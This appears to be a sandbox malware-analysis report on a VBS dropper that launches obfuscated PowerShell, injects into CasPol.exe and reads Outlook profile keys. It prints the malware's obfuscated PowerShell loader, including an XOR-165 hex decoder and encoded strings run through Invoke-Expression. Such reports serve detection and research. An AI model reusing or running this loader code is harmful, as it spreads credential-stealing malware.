'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AAB6 AdjustTokenPrivileges, 7_2_1D45AAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AA7F AdjustTokenPrivileges, 7_2_1D45AA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1 Jump to behavior
Source: classification engine Classification label: mal96.troj.spyw.evad.winVBS@7/4@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:304:WilStaging_02
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB00BD pushad ; iretd 2_2_00007FF825BB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB0428 push E95D2E73h; ret 2_2_00007FF825BB0459
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6629 push ss; retf 0000h 7_2_00CC662A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6638 push ss; retf 0000h 7_2_00CC667A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC431 push 00000039h; ret 7_2_00DAC434
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D452551 pushfd ; ret 7_2_1D45255A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453450 push edx; ret 7_2_1D453462
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45255D push esp; ret 7_2_1D452566
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453168 push 8140738Fh; ret 7_2_1D45320A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45343D push esi; ret 7_2_1D45343E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4533C2 push edi; ret 7_2_1D4533D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4524DC push esp; ret 7_2_1D452566
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4526F8 push esp; ret 7_2_1D45276A
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
